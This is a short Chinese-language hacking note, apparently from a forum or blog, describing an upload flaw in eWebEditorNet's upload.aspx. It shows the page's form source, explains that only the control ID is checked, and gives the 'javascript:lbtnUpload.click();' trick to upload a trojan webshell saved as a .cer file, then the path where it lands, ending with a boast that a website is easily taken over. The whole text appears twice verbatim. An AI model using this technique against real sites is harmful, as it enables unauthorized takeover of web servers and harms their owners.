eWebEditorNet 主要是一个upload.aspx文件存在上传漏洞
原理
<form id="myform" method="post" encType="multipart/form-data" runat="server">
<INPUT id="uploadfile" style="HEIGHT: 18px" type="file" size="28" name="uploadfile" runat="server">
<asp:linkbutton id="lbtnUpload" runat="server"></asp:linkbutton></form>
<script language="JavaScript">
// 上传表单已装入完成
try {
parent.UploadLoaded();
}
catch(e){
}
</script>
只是简单的对ID进行验证
只要构造
javascript:lbtnUpload.click();
满足条件
达到上传木马的效果
成功以后查看源代码
<a id="lbtnUpload" href="javascript:__doPostBack('lbtnUpload','')"></a><script language='javascript'>parent.UploadSaved('200711141044412198.cer');history.back();</script>
木马的具体地址为
/eWebEditorNet/UploadFile/200711141044412198.cer
这样就轻松的拿下了一个网站
原理
<form id="myform" method="post" encType="multipart/form-data" runat="server">
<INPUT id="uploadfile" style="HEIGHT: 18px" type="file" size="28" name="uploadfile" runat="server">
<asp:linkbutton id="lbtnUpload" runat="server"></asp:linkbutton></form>
<script language="JavaScript">
// 上传表单已装入完成
try {
parent.UploadLoaded();
}
catch(e){
}
</script>
只是简单的对ID进行验证
只要构造
javascript:lbtnUpload.click();
满足条件
达到上传木马的效果
成功以后查看源代码
<a id="lbtnUpload" href="javascript:__doPostBack('lbtnUpload','')"></a><script language='javascript'>parent.UploadSaved('200711141044412198.cer');history.back();</script>
木马的具体地址为
/eWebEditorNet/UploadFile/200711141044412198.cer
这样就轻松的拿下了一个网站